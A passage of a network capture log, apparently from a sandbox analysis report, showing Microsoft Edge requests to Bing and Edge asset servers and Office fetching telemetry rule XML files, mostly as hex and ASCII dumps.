2024-11-11 09:33:25 UTC	57	IN	Data Raw: 39 00 00 00 0a 00 00 00 6d 75 72 6d 75 72 33 00 0d 00 00 00 e7 00 00 00 0c 00 00 00 2c 4d f0 68 e4 05 e3 5a 14 87 bb 38 10 5c e2 c4 94 3c 26 4c 69 f1 48 99 f4 5b b2 3f 6d Data Ascii: 9murmur3,MhZ8\<&LiH[?m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49840	23.33.40.136	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	628	OUT	OPTIONS /bnc/notifications/count?app=anaheim&pageId=ntp HTTP/1.1 Host: www.bing.com Connection: keep-alive Accept: / Access-Control-Request-Method: GET Access-Control-Request-Headers: x-personalbing-csrf,x-personalbing-flights,x-search-clientid,x-search-uilang Origin: https://ntp.msn.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:25 UTC	2234	IN	HTTP/1.1 200 OK Content-Length: 0 Access-Control-Allow-Headers: * Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Max-Age: 7200 Cache-Control: private X-EventID: 6731cf65e31c4b62b8474ab9ca132fe6 UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-LUn5SZakttoXgNoI2N5O2PLrxO2p0X7sUHfgQE7vM58='; base-uri 'self';report-to csp-endpoint Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]} P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Mon, 11 Nov 2024 09:33:25 GMT Connection: close Set-Cookie: MUID=1AC4DA455F586E772F52CF715E566FCA; domain=.bing.com; expires=Sat, 06-Dec-2025 09:33:25 GMT; path=/; secure; SameSite=None Set-Cookie: MUIDB=1AC4DA455F586E772F52CF715E566FCA; expires=Sat, 06-Dec-2025 09:33:25 GMT; path=/; HttpOnly Set-Cookie: _EDGE_S=F=1&SID=00C5FFC0736267632F19EAF4726C66E4; domain=.bing.com; path=/; HttpOnly Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Sat, 06-Dec-2025 09:33:25 GMT; path=/; HttpOnly Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Wed, 11-Nov-2026 09:33:25 GMT; path=/; secure; HttpOnly; SameSite=None Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Wed, 11-Nov-2026 09:33:25 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUID=V=2&GUID=EA804FF8B0A340FD85DFA691590CC65E&dmnchg=1; domain=.bing.com; expires=Wed, 11-Nov-2026 09:33:25 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHUSR=DOB=20241111; domain=.bing.com; expires=Wed, 11-Nov-2026 09:33:25 GMT; path=/; secure; SameSite=None Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Wed, 11-Nov-2026 09:33:25 GMT; path=/; secure; SameSite=None Set-Cookie: _SS=SID=00C5FFC0736267632F19EAF4726C66E4; domain=.bing.com; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.cb292117.1731317605.2439c2db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49841	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:26 UTC	557	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:26 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: f3d450ae-001e-004e-171c-34ade2000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093325Z-174f7845968jrjrxhC1EWRmmrs00000004y0000000002g3w Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:26 UTC	15827	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6 Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp4'eD)q:
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37 Data Ascii: kD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-x$$QifD`7
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 6e 30 91 49 05 4e 42 60 22 53 9e 67 6f 08 ac 30 cf 05 cd b5 Data Ascii: sg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM*]z_]y]DZgtc>qDX\\M,SqPn0INB`"Sgo0
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e 6f 2b 5e 74 f2 ea 6e 17 ed 6d 37 04 2d f5 5a 8e f8 43 2b c3 Data Ascii: MR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.Vo+^tnm7-ZC+
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 4e 60 6b e1 20 c2 ba 99 b8 6d 1e 51 d5 3c d5 da e1 b5 2c a1 Data Ascii: yfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\N`k mQ<,
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 45 bf 50 93 bc bc 7d c3 e9 75 22 5d 68 d9 1e 50 8f 5c 23 a1 Data Ascii: b.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>JcEP}u"]hP\#
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 c6 95 ea 57 bd 73 50 18 1d 54 fb 07 d5 da 41 bd 99 aa 6f 53 Data Ascii: u\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{OWsPTAoS
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 65 5d 3f 2f 1b ab ff 79 9a 2b b3 79 5d 62 4f 7c d5 ff 34 22 Data Ascii: Jj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@e]?/y+y]bO\|4"
2024-11-11 09:33:26 UTC	16384	IN	Data Raw: 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 cb e9 d4 75 42 52 43 29 e8 e5 94 bf 82 e4 a6 c8 40 37 67 5f Data Ascii: IdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>uBRC)@7g_

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.5	49842	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 78b03680-101e-000b-4bd5-335e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093325Z-174f7845968n2hr8hC1EWR9cag00000004bg000000005a11 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.5	49845	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 072c0228-901e-00ac-3ad5-33b69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093325Z-174f78459685m244hC1EWRgp2c00000004ng000000002e2z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.5	49846	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 8377dffe-c01e-00a1-6ad5-337e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093325Z-174f7845968v79b7hC1EWRu01s00000004a0000000006qur x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:25 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.5	49844	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:25 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:25 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 5eaa081d-f01e-0099-68d5-339171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093325Z-174f7845968xlwnmhC1EWR0sv800000004fg0000000099sq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
